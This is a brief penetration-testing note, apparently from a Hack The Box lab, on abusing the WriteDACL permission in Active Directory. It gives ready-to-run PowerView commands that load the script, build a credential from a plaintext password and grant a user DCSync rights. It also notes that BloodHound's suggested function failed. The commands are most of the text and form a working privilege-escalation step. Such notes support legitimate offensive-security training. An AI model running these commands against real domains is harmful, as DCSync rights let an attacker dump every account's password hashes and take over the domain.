WriteDACL

With WriteDACL permission, it is possible to grant DCSync rights to a user. With PowerView:

> . .\PowerView.ps1
> $SecPassword = ConvertTo-SecureString 'abc123!' -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\rubytox', $SecPassword)
> Add-ObjectACL -PrincipalIdentity rubytox -Credential $Cred -Rights DCSync

The function Add-DomainObjectACL proposed by BloodHound help did not work.

Last updated 2 years ago